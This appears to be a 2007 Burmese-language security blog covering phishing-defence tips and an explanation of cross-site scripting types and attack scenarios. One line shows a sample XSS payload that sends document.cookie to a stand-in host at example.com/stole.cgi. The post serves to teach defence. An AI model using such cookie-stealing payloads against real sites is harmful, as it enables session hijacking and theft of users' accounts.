Phishing - အီးေမးလ္ ကိုအသံုးျပဳျပီး အင္တာနက္သံုးသူတစ္ဦးကို အင္တာနက္ေနရာ( Web site) အတု တစ္ခုသို႕ ေရာက္လာေအာင္ဖန္တီးကာ credit card, social security, bank စာရင္းအမွတ္ စသည့္ အေရးၾကီးေသာ အခ်က္အလက္မ်ားကို လွည့္ဖ်ားရယူသည့္ အင္တာနက္ ရာဇ၀တ္မႈ တစ္မ်ဳိး။
      1. NoScript - https://addons.mozilla.org/firefox/722/
      2. SafeHistory - www.safehistory.com/
      3. SafeCache - www.safecache.com/
      4. Netcraft Anti-Phishing Toolbar -http://toolbar.netcraft.com/
      5. eBay Toolbar -http://pages.ebay.com/ebay_toolbar/
      6. Google Toolbar - www.google.com/tools/firefox/toolbar/index.html

-လိုအပ္ေသာ ပရိုဂရမ္မ်ား ႏွင့္ ကိရိယာမ်ား ထပ္မံေပါင္းထည့္ေပးပါ။



၃. အခ်ဳိ႕ေသာ အဂၤါရပ္မ်ားကို ရပ္တန္႕ထားျခင္း
အရိုးစင္းဆံုးေျပာရလွ်င္ အဂၤါရပ္ (Features) အခ်ဳိ႕ကိုသာ အလုပ္လုပ္ေစျခင္းသည္ အင္တာနက္ထဲတြင္ သြားလာရသည့္အခါ ပိုမို စိတ္ခ် လံုျခံဳသည့္ အေနအထားကို ျဖစ္ေပၚေစသည္။ ေျပာရလွ်င္ JavaScript, Java, Active X, JScript, VBScript,Flash, ႏွင့္ QuickTime တို႕အားလံုးမွာ အႏၱရာယ္ေပးႏိုင္သည့္ အရာမ်ား ျဖစ္သည္။ ၄င္းနည္းပညာမ်ားသည္ အင္တာနက္လူဆိုးမ်ားအတြက္ လက္နက္ပံုစံသစ္မ်ား ျဖစ္လာ ၾကသည္။ မေကာင္းေသာ အခ်က္တစ္ခုမွာ အဆိုပါ အဂၤါရပ္မ်ားကို အလုပ္မလုပ္ႏိုင္ေအာင္ ရပ္တန္႔ထား ျခင္းသည္ အခ်ဳိ႕ေသာ Web site မ်ား၏ အလုပ္လုပ္မႈ အေနအထားကို ရပ္တန္႕ေစျခင္း၊ တ၀က္တပ်က္သာ အလုပ္လုပ္ေစျခင္း စသည္တို႕ ျဖစ္ေပၚလာေစႏိုင္သည္။
မည္သို႕ပင္ ျဖစ္ေစ ၄င္းတို႕ကိုရပ္တန္႕ထားျခင္းက ပို၍ အက်ဳိးမ်ားေစသည္။ ထို႕ေၾကာင့္ အခ်ဳိ႕ေသာ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲမ်ား ႏွင့္ ၄င္းတို႕၏ ေနာက္ဆက္တြဲမ်ား (Extensions) သည္ အထက္တြင္ေဖာ္ျပခဲ့သည့္ အဂၤါရပ္မ်ားကို လိုအပ္သလို ဖြင့္/ပိတ္ျခင္းမ်ားကို အလ်င္ အျမန္ ေဆာင္ရြက္ေပးႏိုင္ ေအာင္ဖန္တီးထားျခင္းျဖစ္သည္။

-အႏၱရာယ္ေပးႏိုင္ေသာ အခ်ဳိ႕အရာမ်ား (JavaScript, Java, Active X, JScript, VBScript, Flash, ႏွင့္ QuickTime) ကို မျဖစ္မေန လိုအပ္မွသာ အလုပ္လုပ္ပါေစ။ မလိုအပ္က ရပ္ထားပါ။


၄. ကြန္ပ်ဳတာ စက္အတု (Virtual Machine) တစ္ခုကို သံုးျခင္း
ယခုအခါ ကြန္ပ်ဳတာ စက္အတု (Virtual Machine) ကဲ့သို႕ေသာ အတုဖန္တီးထားသည့္ ေနရာမ်ားမွတဆင့္ အင္တာနက္ကို အသံုးျပဳေနသူမ်ား တေန႕ထက္တေန႕ တိုးတက္ မ်ားျပားလာေနျပီ ျဖစ္သည္။ အကယ္၍ အေျခအေန တစ္ခုခု ထူးျခားမႈျဖစ္ေပၚလာပါက စက္အတုထဲတြင္သာ ျပႆနာ တက္မည္ျဖစ္ျပီး ပင္မ ကြန္ပ်ဳတာကို ထိခိုက္မႈ မရွိႏိုင္ေပ။
ကြန္ပ်ဳတာ စက္အတု (Virtual Machine) - တကယ့္ ကြန္ပ်ဳတာတစ္လံုးကဲ့သို႕ အလုပ္လုပ္ေပးႏိုင္ေသာ ကြန္ပ်ုဳတာ ေဆာ့ဖ္၀ဲတစ္မ်ဳိး၊ Operating System တစ္ခု ထည့္သြင္းတပ္ဆင္ေပးရသည္။ အျခားေသာ ေဆာ့ဖ္၀ဲမ်ားလည္း ထည့္သြင္းႏိုင္သည္။
-မိမိအကၽြမ္းတ၀င္မရွိေသာ Web site မ်ား၊ ေဆာ့ဖ္၀ဲမ်ားကို စမ္းသပ္ အသံုးျပဳရသည့္အခါ ေဘးကင္းေစရန္ အတြက္ ကြန္ပ်ဳတာ စက္အတု (Virtual Machine) ကို အသံုးျပဳပါ။


၅. အီးေမးလ္ အတြင္းရွိ အင္တာနက္ လိပ္စာမ်ားကို ဘယ္ေတာ့မွ ကလစ္မလုပ္ပါႏွင့္
အီးေမးလ္အတြင္းပါ၀င္လာသည့္ -
  • လိပ္စာႏွင့္ အင္တာနက္ေနရာမ်ား၊
  • ရုပ္ပံုမ်ား ကို တတ္ႏိုင္သမွ် မည္သည့္ အခ်ိန္တြင္မွ ကလစ္မလုပ္ပါႏွင့္။
  • ၄င္းလိပ္စာမ်ားသည္ပင္ အႏၱရာယ္ျဖစ္ေနျပီး၊
  • Phishing အီးေမလ္မ်ားကို ရွာေဖြ ေဖာ္ထုတ္ႏိုင္ရန္မွာလည္းခက္ခဲသည္။
အကယ္၍ အီးေမးလ္တစ္ေစာင္သည္ အစစ္အမွန္ျဖစ္ေၾကာင္း မေသခ်ာပါက၊ ေဆာင္ရြက္ႏိုင္သည့္ အေကာင္းဆံုးနည္းမွာ ေပးထားေသာ လိပ္စာကို အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲ၏ လိပ္စာေဖၚျပသည့္ေနရာတြင္ ကိုယ္တိုင္ရုိက္ျပီး ထည့္သြင္းျခင္းျဖစ္သည္။ ဤနည္းအားျဖင့္ မိမိေရာက္သြားမည့္ေနရာသည္ အစစ္အမွန္ေနရာတစ္ခု ျဖစ္ေၾကာင္း အေတာ္အတန္ အာမခံခ်က္ ရရွိႏိုင္ေပသည္။

ခြ်င္းခ်က္ တစ္ခုေတာ့ ထားရွိရမည္ ျဖစ္သည္။
ဥပမာအားျဖင့္ မိမိ၏လုပ္ေဆာင္မႈ တစ္ခုကို တုုန္႕ျပန္ေပးရန္ ခ်က္ခ်င္း ေပးပို႕လာေသာ အီးေမးလ္မ်ား
(Web site တစ္ခုတြင္ မွတ္ပံုတင္ျခင္း၊ စကား၀ွက္ ေမ့သြားျခင္း ေၾကာင့္ ျပန္ေတာင္းျခင္း/ျပန္ျပင္ျခင္း၊ ကုန္၀ယ္အမွာစာ အတည္ျပဳျခင္း .. စသည္) ကို မိနစ္ပိုင္းအတြင္း ျပန္လည္ တုန္႕ျပန္ ေဆာင္ရြက္ေပးရသည့္ အခါမ်ဳိး အတြက္ ျဖစ္သည္။
-မိမိ၏ လိုအပ္ခ်က္ေၾကာင့္ ခ်က္ခ်င္းေရာက္လာျပီး ခ်က္ခ်င္းတုန္႕ျပန္ေပးရမည့္ အီးေမးလ္မ်ားအတြင္းရွိ လိပ္စာမ်ားမွ အပ၊ အျခားမည္သည့္ အီးေမးလ္မ်ားအတြင္းရွိ လိပ္စာမ်ား၊ ပံုမ်ား ကိုမဆို ကလစ္ မလုပ္ပါႏွင့္။


၆. မိမိ၏ Web mail ကို ကာကြယ္ထားပါ
လူသန္းေပါင္းမ်ားစြာတို႕သည္ နည္းအမ်ဳိးမ်ဳိးျဖင့္ Web mail မ်ားကို အသံုးျပဳလ်က္ ရွိေနၾကသည္။ ၄င္းကို မိမိ၏ ဘဏ္စာရင္း နံပါတ္ ထက္ပင္ လွ်ဳိ၀ွက္ သိမ္းဆည္းထားသင့္ေပသည္။ လူေပါင္းမ်ားစြာတို႕သည္ အေရးၾကီးေသာ အင္တာနက္ ေပၚမွ Account မ်ားကို Web mail လိပ္စာ တစ္ခုတည္းျဖင့္ ရယူ သိမ္းဆည္း ထားတတ္ေလ့ရွိၾကသည္။ အကယ္၍ တစ္စံုတစ္ေယာက္က မိမိ၏ အီးေမးလ္လိပ္စာကို နည္းလမ္းတစ္ခုခုျဖင့္ အသံုးျပဳႏိုင္သြားမည္ဆိုပါက ထိုသူသည္ ၄င္းအီးေမးလ္တြင္ ခ်ိတ္ဆက္ထားေသာ အျခားေသာ Account မ်ားကိုပါ သံုးခြင့္ရသြားမည္ ျဖစ္သည္။

သင့္အေနျဖင့္ ေဆာင္ရြက္ႏိုင္သည့္ အေကာင္းဆံုးအရာတစ္ခုမွာ -
  • အလြယ္တကူ မခန္႕မွန္းႏိုင္ေသာ စကား၀ွက္မ်ဳိးကို အသံုးျပဳျခင္း၊
  • စကား၀ွက္မ်ားကို အနည္းဆံုး ၃ လတစ္ၾကိမ္ ေျပာင္းလဲျခင္း၊
  • ၄င္းစကား၀ွက္ကို အျခားမည္သည့္ေနရာတြင္မွ မသံုးျခင္း၊
  • အလုပ္အမ်ဳိးမ်ဳိးအတြက္ အီးေမးလ္ လိပ္စာ အဆင့္အတန္းအမ်ဳိးမ်ဳိးထားရွိ အသံုးျပဳျခင္း တို႕ ျဖစ္သည္။
အေရးၾကီးေသာ အခ်က္အလက္မ်ားပါ၀င္ေနသည့္ မည္သည့္ အီးေမးလ္ကိုမဆို ဖတ္ရႈျပီးသည့္အခါ ဖ်က္ဆီးပစ္လိုက္ျခင္း သည္လည္း ေကာင္းမြန္ေသာ လုပ္ေဆာင္ခ်က္ တစ္ခု ျဖစ္သည္။
-မိမိ၏ အီးေမးလ္ စကား၀ွက္ ကို ေကာင္းစြာ ကာကြယ္ထားပါ။ အေရးၾကီးေသာ အေၾကာင္းအရာမ်ားကို အီးေမးလ္ Inbox ထဲတြင္ သိမ္းမထားပါႏွင့္။ အမ်ားႏွင့္ သက္ဆိုင္ေသာ၊ လူမ်ားစုအတြက္ ခ်ေပးရမည့္ အီးေမးလ္လိပ္စာကို အျခား အေရးၾကီးေသာ ေနရာမ်ားတြင္ မသံုးပါႏွင့္။


၇. ရွည္လ်ားေသာ အင္တာနက္လိပ္စာမ်ားကို သတိထားပါ
အကယ္၍ အင္တာနက္လိပ္စာ တစ္ခုသည္ စာေၾကာင္း တစ္ေၾကာင္းထက္ပိုမိုိုရွည္လ်ားျပီး၊ ရာခိုင္ႏႈန္း သေကၤတမ်ား % ျဖင့္ ေျပာင္းလဲ ေဖာ္ျပထားပါက အထူးသတိျပဳသင့္သည္။ အကယ္၍ အင္တာနက္လိပ္စာ တစ္ခု၏ သဘာ၀ အမွန္ကို မသိပါက ၄င္းတို႕ကို မူရင္း သေကၤတ အျဖစ္ ျပန္ေျပာင္းျပီး အတြင္းတြင္ HTML သေကၤတမ်ား ပါ၀င္ေနျခင္း ရွိမရွိ စစ္ေဆးပါ။

-HTML သေကၤတမ်ား ပါ၀င္ေနပါက ၄င္းလိပ္စာကို ကလစ္မလုပ္ပါႏွင့္။


၈. URL အတိုခ်ဳံးေပးေသာ ၀န္ေဆာင္မႈမ်ား
URL အတိုခ်ဳံးေပးေသာ ၀န္ေဆာင္မႈမ်ားကို သတိထားပါ။ အခ်ဳိ႕ေသာ အင္တာနက္လူဆိုးမ်ားသည္ မိမိတို႕၏ ေကာက္က်စ္ေသာ အင္တာနက္လိပ္စာမ်ားကို ကြယ္၀ွက္ႏိုင္ရန္အတြက္ TinyURL, snipURL, notlong, shorl, ႏွင့္ doiop တို႕ကဲ့သို႕ေသာ အင္တာနက္လိပ္စာ ေျပာင္းေပးသည့္ ၀န္ေဆာင္မႈမ်ားကို သံုးေလ့ရွိၾကသည္။ ထိုကဲ့သို႕ေသာ လိပ္စာမ်ားကို စစ္ေဆးႏိုင္ရန္အတြက္ လိုအပ္ပါက Command Line ထဲတြင္ ရိုက္ထည့္ျပီး တိုက္ရိုက္ စစ္ေဆး ၾကည့္ႏိုင္သည္။ အကယ္၍ လိပ္စာ အစစ္အမွန္ျဖစ္ပါက အမွန္အတိုင္းလမ္းညႊန္မည္ ျဖစ္သည္။ ယခုကဲ့သို႕ လိပ္စာေျပာင္းေပးေသာ ၀န္ေဆာင္မႈမ်ားသည္လည္း ၄င္းတို႕ထံေရာက္လာေသာ လိပ္စာ မွန္မမွန္ကို အာမခံႏိုင္မည္ မဟုတ္ေပ။
-ထို႕ေၾကာင့္ မည္သည့္ ေနရာကိုမဆို ကလစ္ လုပ္ေတာ့မည္ဆိုပါက အထူးသတိထားရန္လိုမည္ ျဖစ္ေပသည္။ မသိေသာ၊ သံသယရွိေနေသာ လိပ္စာမ်ားကို ကလစ္မလုပ္ပါႏွင့္။


သတိျပဳေစလိုသည္မွာ - ယခုေဖာ္ျပထားေသာ အခ်က္မ်ား သည္လည္း မိမိတို႕ကို အေတာ္အသင့္ မွ်သာ အကာအကြယ္ေပးႏိုင္မည္ျဖစ္ျပီး ရာႏႈန္းျပည့္ အကာအကြယ္ ေပးႏိုင္မႈအတြက္ သက္ဆိုင္သူ တစ္ဦးခ်င္းစီ အေနျဖင့္ အျမဲမျပတ္ ဆက္လက္ ေလ့လာသြားရန္ အထူးပင္ အေရးၾကီးလွပါေၾကာင္း -


REF -
- http://en.wikipedia.org/wiki/Xss
- http://www.cgisecurity.com/articles/xss-faq.shtml
- XSS Attacks - CROSS SITE SCRIPTING EXPLOITS AND DEFENSE by Syngress

Jul 10, 2007

XSS သို႕မဟုတ္ Cross-Site Scripting -တိုက္ခိုက္မႈ နမူနာမ်ား


XSS တိုက္ခိုက္မွႈ နမူနာမ်ား

XSS ဂယ္ေပါက္ အမ်ဳိးမ်ဳိးရွိေနသည့္အတြက္ တိုက္ခိုက္သူမ်ား၏ လုပ္ေဆာင္ပံုမ်ားမွာလည္း အမ်ဳိးမ်ဳိး ျဖစ္လာႏိုင္သည္။
တိုက္ခိုက္မႈနမူနာမ်ားကို ေလ့လာၾကည့္ၾကပါစို႕ ...

အားနည္းခ်က္ (၁)-တိုက္ခိုက္မႈ

  1. တိုက္ခိုက္သူသည္ သားေကာင္ဆီသို႕ အီးေမးလ္ သို႕မဟုတ္ အျခားေသာ နည္းလမ္းတစ္ခု ျဖင့္ ေကာက္က်စ္စြာဖန္တီးထားေသာ အင္တာနက္စာမ်က္ႏွာ တစ္ခုကို ဖြင့္ေပးမည့္ အင္တာနက္လိပ္စာ (ဥပမာ - --www.attackexample.com/test/readme.html-- )တစ္ခုကို ေပးပို႕လိုက္သည္။
  2. သားေကာင္က ထို လိပ္စာကို ႏွိပ္ လိုက္သည္။ (click လုပ္လိုက္သည္။) ဤတြင္ တိုက္ခိုက္သူ၏ ဖန္တီးထားေသာအင္တာနက္ စာမ်က္ႏွာမွာ သားေကာင္၏ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲတြင္ ပြင့္လာသည္။
  3. တိုက္ခိုက္သူက ၾကိဳတင္ဖန္တီးထားသည့္အတိုင္းပင္ ၄င္းစာမ်က္ႏွာတြင္ ပါလာေသာ JavaScript သေကၤတမ်ားက သားေကာင္၏ ကြန္ပ်ဳတာထဲတြင္ ရွိႏွင့္ေနေသာ ဟာကြက္ ျဖစ္ေပၚေနသည့္ အင္တာနက္စာမ်က္ႏွာ တစ္ခုကို ထပ္ဖြင့္လိုက္ၾကသည္။
  4. အဆိုပါ ဟာကြက္ျဖစ္ေပၚေနသည့္ အင္တာနက္စာမ်က္ႏွာထဲတြင္ ပါ၀င္ေနေသာ JavaScript သေကၤတမ်ားက သားေကာင္၏ ကြန္ပ်ဳတာ ဟာ့ဒ္ဒစ္ (Local zone) အတြင္းတြင္ ေကာင္းစြာ အလုပ္လုပ္ႏိုင္သည္။
  5. ဤနည္းအားျဖင့္ တိုက္ခိုက္သူေပးပို႕လိုက္ေသာ ေကာက္က်စ္စြာ ဖန္တီးထားေသာ သေကၤတမ်ားသည္ သားေကာင္၏ ကြန္ပ်ဴတာထဲတြင္ ၾကိဳတင္ရွိေနေသာ ဟာကြက္ကို အခြင့္ေကာင္းယူ အသံုးခ်လ်က္ -
    1. အမိန္႕ေပးခ်က္မ်ား ေပးပို႕ ခိုင္းေစႏိုင္သည္။
    2. အခ်ဳိ႕ေသာ ေဆာ့ဖ္၀ဲမ်ား ပရိုဂရမ္မ်ားကို သားေကာင္မသိဘဲ တိတ္တဆိတ္ အလုပ္လုပ္ေစႏိုင္သည္။
    3. တိုက္ခိုက္သူထံအခ်က္အလက္မ်ား ျပန္လည္ေပးပို႕ႏိုင္သည္။
အားနည္းခ်က္ (၂)-တိုက္ခိုက္မႈ
  1. ေက်ာ္ေက်ာ္သည္ ေအာင္ေအာင္တည္ေထာင္ထားေသာ ၀က္ဘ္ဆိုက္တစ္ခုဆီသို႕ မၾကာခဏ ၀င္ေရာက္လည္ပတ္ေလ့ ရွိသည္။ ၄င္း၀က္ဘ္ဆိုက္သို႕ ၀င္ေရာက္ႏိုင္ရန္အတြက္ ေက်ာ္ေက်ာ္သည္ Username ႏွင့္ Password တစ္ခုကို အသံုးျပဳရသည္။ ၀က္ဘ္ဆိုက္ ထဲတြင္ ေက်ာ္ေက်ာ္၏ ေငြေၾကးဆိုင္ရာ အခ်က္အလက္ မ်ားကဲ့သို႕ေသာ အေရးၾကီး အခ်က္အလက္မ်ား သိမ္းဆည္းထားသည္။
  2. တိုက္ခိုက္သူတစ္ဦးက ေအာင္ေအာင္၏၀က္ဘ္ဆိုက္တြင္ “အေျခအေနအေပၚမူတည္ျပီး ျဖစ္ေပၚလာေသာေပ်ာ႕ကြက္ - Reflected XSS ” တစ္ခု ျဖစ္ေပၚေနေၾကာင္း ေလ့လာ ေတြ႕ရွိထားသည္။
  3. တိုက္ခိုက္သူသည္ အဆိုပါ အားနည္းခ်က္ကို အျမတ္ထုတ္ႏိုင္ရန္အတြက္-
    1. (ေအာင္ေအာင္၏ ၀က္ဘ္ဆိုက္လိပ္စာႏွင့္ ဆင္တူယိုးမွား) အင္တာနက္လိပ္စာအတုတစ္ခုကို ဖန္တီးလိုက္ျပီး ေက်ာ္ေက်ာ္ထံသို႕ အီးေမးလ္တစ္ေစာင္ေပးပို႕လိုက္သည္။
    2. ၄င္းအီးေမးလ္ကိုလည္း ေအာင္ေအာင့္ ထံမွ ေပးပို႕သည့္အလား အျပင္အဆင္တူေအာင္ အားလံုး လွည့္စား ဖန္တီး ထားသည္။
    3. (အင္တာနက္ လံုျခံဳေရးနယ္ပယ္တြင္ ဤနည္းစနစ္ကို အီးေမးလိပ္စာ လွည့္ဖ်ားျခင္း - e-mail address spoofing ဟု ေခၚၾကသည္။)
      (ဥပမာ - --www.google.com-- အစား --www.googla.com--, --www.domainname.com အစား --www.domainame.com-- etc)
  4. ေက်ာ္ေက်ာ္သည္-
    1. ( ၄င္းမၾကာခဏ အသံုးျပဳေနေသာ ေအာင္ေအာင္၏၀က္ဘ္ဆိုက္မွ ေပးပို႕သည့္စာ အမွတ္ျဖင့္) တိုက္ခိုက္သူ၏ အီးေမးလ္ကို ဖြင့္ၾကည့္ရင္း
    2. အထဲရွိ အင္တာနက္လိပ္စာ အတိုင္း လိုက္သြားကာ ေအာင္ေအာင္၏ ၀က္ဘ္ဆိုက္တြင္ Log In ျပဳလုပ္သည္။
  5. ဤတြင္-
    1. တိုက္ခိုက္သူ ဖန္တီးထားေသာ အင္တာနက္လိပ္စာ အတုအတြင္း ျမဳတ္ႏွံထည့္သြင္း ထားေသာ မသမာသည့္ သေကၤတမ်ားက
    2. ေအာင္ေအာင္၏ ၀က္ဘ္ဆိုက္ အတြင္းမွ တိုက္ရိုက္ေပးပို႕လိုက္ေသာ သေကၤတမ်ား ကဲ့သို႕ ဟန္ေဆာင္ကာ
    3. ေက်ာ္ေက်ာ္၏ အင္တာနက္ၾကည့္ ေဆာ့ဖ္၀ဲအတြင္းတြင္ အလုပ္လုပ္ေတာ႕သည္။
    4. ေက်ာ္ေက်ာ္မွ ေအာင္ေအာင္၏ ၀က္ဘ္ဆိုက္ အတြင္းသို႕ ၀င္ေရာက္ႏိုင္ရန္ ထည့္သြင္းေပးရေသာ အေရးၾကီးေသာ အခ်က္အလက္မ်ား (User name, Password, Billing informations .... etc.)ကုိ ခိုးယူကာ တိုက္ခိုက္သူထံသို႕ တိတ္တဆိတ္ေပးပို႕ ေနေတာ႕သည္။
    5. example - Image taken from Microsoft MSDN libarary for XSS
အားနည္းခ်က္ (၃)-တိုက္ခိုက္မႈ
  1. ေအာင္ေအာင္သည္ ၀က္ဘ္ဆိုက္တစ္ခုကို တည္ေထာင္ထားသည္။ ၄င္းဆိုက္ကို အသံုးျပဳေနၾကေသာ သူမ်ားသည္ အျခားေသာသူမ်ား ဖတ္ရႈေစႏိုင္ရန္အတြက္ အသိေပးခ်က္မ်ားႏွင့္ အျခားအေၾကာင္းအရာမ်ားကို ေပးပို႕ခြင့္ရွိၾကသည္။( ဥပမာ-အင္တာနက္ေပၚရွိ ဖိုရမ္မ်ား)
  2. တိုက္ခိုက္သူ တစ္ဦးသည္ ေအာင္ေအာင္၏၀က္ဘ္ဆိုက္တြင္ XSS အားနည္းခ်က္(၃) ကို အသံုးျပဳ၍ တိုက္ခိုက္ႏိုင္သည့္ ေပ်ာ့ကြက္ရွိေနေၾကာင္း သတိထားမိသည္။
  3. တိုက္ခိုက္သူသည္ (လူ႕တို႕၏ စိတ္၀င္စားတတ္ေသာ သဘာ၀ကိုေကာင္းစြာအသံုးခ်လ်က္) ၀က္ဘ္ဆိုက္သို႕ ေရာက္လာမည့္ အျခားသူမ်ားလည္း ေသခ်ာေပါက္လာေရာက္ၾကည့္ရႈမည့္ အျငင္းပြားဖြယ္ရာ ေဆြးေႏြးျငင္းခုန္စရာ အသိေပးခ်က္အခ်ဳိ႕ကို တင္ထားလိုက္သည္။
  4. ထိုအသိေပးခ်က္မ်ားထဲတြင္ တိတ္တဆိတ္ ျမဳတ္ႏွံထည့္သြင္းထားေသာ သေကၤတမ်ားေၾကာင့္၊ လာေရာက္ဖတ္ရႈၾကသည့္-
    1. ၄င္း၀က္ဘ္ဆိုက္သို႕ လာေရာက္လည္ပတ္ေသာသူမ်ား၏ လတ္တေလာအေျခအေနကို သိမ္းဆည္းထားသည့္ အခ်က္အလက္မ်ား (Session cookies) သို႕မဟုတ္
    2. အျခားေသာ အေထာက္အထားမ်ား ( User name, password စသည္)ကို ထိုသူမ်ား မသိေအာင္ တိုက္ခိုက္သူ၏ Web Server ထံသို႕ တိတ္တဆိတ္ ေပးပို႕ေတာ႕သည္။
  5. ေနာက္ပိုင္းတြင္ တိုက္ခိုက္သူသည္ အျခားေသာသူမ်ားအမည္ျဖင့္ ၀က္ဘ္ဆိုက္ထဲသို႕ ၀င္ ေရာက္ျပီး ထင္ရာလုပ္ႏိုင္ေလသည္။
  6. Session cookie မ်ားခိုးယူႏိုင္ေသာ နမူနာ သေကၤတမ်ား
-< href="#" onclick="window.location='http://example.com/stole.cgi?text='+escape(document.cookie); return false;">Click here! < /a >-

ဆက္လက္ေဖာ္ျပပါမည္ ....

REF - http://en.wikipedia.org/wiki/Xss

Jul 6, 2007

XSS သို႕မဟုတ္ Cross-Site Scripting - အမ်ဳိးအစားမ်ား


အမ်ဳိးအစားမ်ား

အခုအခ်ိန္တြင္ XSS ၏အားနည္းခ်က္မ်ားကို အမ်ဳိးအစားသံုးမ်ဳိးျဖင့္ ေဖာ္ျပၾကသည္။
၄င္းတို႕ကို အေခၚရလြယ္ေစရန္ အားနည္းခ်က္ (၁)(၂)(၃) ဟု အမည္ေပးလိုက္ပါမည္။

အားနည္းခ်က္ (၁)

XSS ၏အားနည္းခ်က္(၁) ကို DOM-based သို႕မဟုတ္ Local cross-site scripting ဟုေျပာၾကသည္။ ျပႆနာက တျခားေနရာမွာ မရွိဘဲ ၄င္းအင္တာနက္ စာမ်က္ႏွာအတြင္းမွာပင္ ရွိေနသည္္။ ဥပမာ - ဆိုၾကပါစို႕
  • အကယ္၍ JavaScript သေကၤတ တစ္ခုသည္ အင္တာနက္လိပ္စာ (URL) တစ္ခုကို ေတာင္းဆိုသည့္ ေဆာင္ရြက္ခ်က္တစ္ခုကို ျပဳလုပ္ျပီးေနာက္
  • ရရွိလာေသာ အခ်က္အလက္မ်ားကို အသံုးျပဳျပီး
  • မူလစာမ်က္ႏွာအတြင္းမွာပင္ HTML အခ်ဳိ႕ျပန္ေရးလိုက္သည့္ အခါမ်ဳိးတြင္ XSS ဂယ္ေပါက္(hole) တစ္ခုျဖစ္လာသည္။
လက္ေတြ႕အားျဖင့္ အားနည္းခ်က္(၁)မွာ (၂)ႏွင့္ အေတာ္ေလးဆင္တူသည္။အလြန္အေရးၾကီးေသာ အခ်က္တစ္ခ်က္တြင္သာလွ်င္ ကြဲလြဲမႈရွိေနသည္။
  • Internet Explorer ေဆာ့ဖ္၀ဲ၏ Local Zone ဟုေခၚေသာ၊ အင္တာနက္သံုးေနသူမ်ား၏ ဟာ့ဒ္ဒစ္အတြင္းရွိ Client-site script မ်ားကိုကိုင္တြယ္ လုပ္ေဆာင္ပံုေၾကာင့္၊
  • အားနည္းခ်က္(၁)မွတဆင့္ အေ၀းမွ ထိမ္းေက်ာင္းႏိုင္ေသာ အေနအထားမ်ဳိးအထိ ျဖစ္သြားေစႏိုင္သည္။
ဥပမာ -
  • တိုက္ခိုက္သူတစ္ဦးသည္ ေကာက္က်စ္ေသာ ၀က္ဘ္ဆိုက္တစ္ခုကို အသံုးျပဳလ်က္ရွိေနသည္။
  • ၄င္းဆိုက္တြင္ အင္တာနက္သံုးေနသူတစ္ဦး၏ ကြန္ပ်ဳတာအတြင္းရွိ ဂယ္ေပါက္ျဖစ္ေနေသာ စာမ်က္ႏွာတစ္ခုႏွင့္ ခ်ိတ္ဆက္မႈ(Link)တစ္ခုပါ၀င္ေနသည့္ ဆိုပါစို႕။
  • ထိုအခါတြင္ တိုက္ခိုက္သူသည္ သားေကာင္၏ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲ အတြင္းမွ ဟာကြက္ကိုေကာင္းစြာအသံုးခ်ျပီး ၄င္းလိုရာ သေကၤတမ်ားကို သားေကာင္၏ ကြန္ပ်ဳတာအတြင္းသို႕ တိတ္တဆိတ္ ထည့္သြင္းလိုက္ႏိုင္သည္။
အားနည္းခ်က္ (၂)

အားနည္းခ်က္ (၂)ကို non-persistent သို႕မဟုတ္ reflected ေပ်ာ႕ကြက္ ဟုေျပာၾကသည္။ အျမဲတမ္း ရွိမေနဘဲ အေျခအေနအခ်ဳိ႕အေပၚမူတည္ျပီး ျဖစ္လာသည့္ ေပ်ာ႕ကြက္ျဖစ္သည္ ဟု ဆိုႏိုင္သည္။ အမ်ားဆံုးျဖစ္ေလ့ရွိေသာ ေပ်ာ႕ကြက္လည္းျဖစ္သည္။
  • ဆာဗာဘက္ျခမ္းရွိ သေကၤတမ်ား (Server-site scripts)အေနျဖင့္ အင္တာနက္သံုးေနသူ တစ္ဦးမွ ထည့္သြင္းေပးလိုက္ေသာ အခ်က္အလက္မ်ားကို အသံုးျပဳျပီး
  • ၄င္းအင္တာနက္သံုးသူအတြက္ လိုအပ္ေသာ စာမ်က္ႏွာတစ္ခုကို
  • ေျဖၾကားခ်က္အျဖစ္ ခ်က္ခ်င္းျပန္လည္ ေပးပို႕ရေလ့ရွိသည္။
  • အကယ္အားျဖင့္ အသံုးျပဳသူမ်ား ထည့္ေပးလိုက္သည့္ အခ်က္အလက္မ်ားကို စနစ္တက် စစ္ေဆးျခင္းမျပဳဘဲ (Unvalidated User-supplied Data အျဖစ္) လက္ခံမိလိုက္သည့္အခါ၊
  • ၄င္းအခ်က္အလက္မ်ားမွာ ဆာဗာမွ ျပန္လည္ေပးပို႕လိုက္သည့္ စာမ်က္ႏွာမ်ားထဲတြင္ ပါ၀င္ သြားသည္။
  • ဤအေျခအေနမ်ဳိးက အသံုးျပဳသူဘက္ရွိ သေကၤတမ်ားကို အသက္၀င္ေျပာင္းလဲေနေသာ (Dynamic) စာမ်က္ႏွာတစ္ခု အတြင္းသို႕ ထည့္ေပးလိုက္သလို ျဖစ္သြားေစသည္။
စံအျဖစ္ေဖာ္ျပေလ့ရွိေသာ ဥပမာမွာ ရွာေဖြေရး၀က္ဘ္ဆိုက္မ်ား (Search Engines) တြင္ျဖစ္သည္။
  • အကယ္၍ တစ္စံုတစ္ေယာက္သည္ ရွာေဖြေရး၀က္ဘ္ဆိုက္တစ္ခုတြင္ ရွာေဖြလိုသည့္ စကားလံုးမ်ား ထည့္သြင္းသည့္အခါ
  • HTML မွ အထူးသေကၤတအခ်ဳိ႕ကို ထည့္သြင္းရွာေဖြလိုက္သည္ဆိုပါစို႕၊
  • ထိုအခါတြင္ ထိုသူ ထည့္သြင္းရွာေဖြလိုက္ေသာ စာေၾကာင္းမ်ားကို
    • ရရွိလာေသာ အေျဖမ်ားထဲတြင္ ျပန္လည္ထည့္သြင္း ေဖာ္ျပေပးျခင္း သို႕မဟုတ္
    • ရွာေနေသာ အေၾကာင္းအရာကို အလြယ္တကူ ျပန္လည္ျပင္ဆင္ႏိုင္ရန္အတြက္ ျပန္လည္ေဖာ္ျပေပးျခင္းမ်ုဳိးကို မျဖစ္မေနေဆာင္ရြက္ေပးရသည္။
  • အကယ္၍ ထည့္ေပးလိုက္ေသာ အသံုးအႏႈံးမ်ားအားလံုးတြင္ HTML အတြက္ အက်ဳံးမ၀င္ေသာ အခ်က္အလက္မ်ား ပါလာသည့္အခါ XSS ဂယ္ေပါက္ တစ္ခု ျဖစ္လာသည္။




အစပိုင္းတြင္ ဤျဖစ္ရပ္မွာ-
